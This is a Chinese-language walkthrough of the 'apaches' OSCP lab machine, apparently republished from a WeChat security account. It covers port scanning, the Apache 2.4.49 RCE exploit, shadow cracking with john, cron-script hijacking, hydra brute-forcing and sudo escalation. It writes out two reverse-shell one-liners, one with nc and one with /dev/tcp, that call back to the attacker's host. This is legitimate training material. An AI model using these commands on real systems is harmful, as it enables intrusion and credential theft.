【OSCP】apaches

OSCP 靶场

靶场介绍

信息收集

主机发现

端口扫描

└─# nmap -sV -A -p- -T4 192.168.31.232
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-13 00:04 EST
Nmap scan report for 192.168.31.232
Host is up (0.0015s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 bc:95:83:6e:c4:62:38:b5:a9:94:0c:14:a3:bf:57:34 (RSA)
|   256 07:fa:46:1a:ca:f3:dc:08:2f:72:8c:e2:f2:2e:32:e5 (ECDSA)
|_  256 46:ff:72:d5:67:c5:1f:87:b1:35:84:29:f3:ad:e8:3a (ED25519)
80/tcp open  http    Apache httpd 2.4.49 ((Unix))
|_http-title: Apaches
|_http-server-header: Apache/2.4.49 (Unix)
| http-robots.txt: 1 disallowed entry 
|_/
| http-methods: 
|_  Potentially risky methods: TRACE
MAC Address: 08:00:27:B2:79:A9 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.46 ms 192.168.31.232

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds

目录扫描

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.31.232  -x php,html,txt -e

权限获取

通过searchsploit 找到apache 2.4.49 存在rce

/50383.sh ip.txt  /bin/sh 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.31.181 8888 >/tmp/f'

团队四个人四个账号。

权限提升

下载linpeas.sh 进行扫描，发现可以查看shadow 文件

john shadow --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt

这里得到了提示信息

查看crontab 可以看到这里利用sacagawea 账号执行了backup.sh 脚本，还有写入的权限。

写入反弹shell 后，提权到sacagawea 用户，成功获取第一次flag

/bin/bash -i >& /dev/tcp/192.168.31.181/8888 0>&1

从目录下找到账号密码

拿到密码后，使用hyrad 对其他用户进行爆破

利用sudo 成功提权到gernimo 账号

这里直接利用sudo 提权到root 权限

原文始发于微信公众号（贝雷帽SEC）：【OSCP】apaches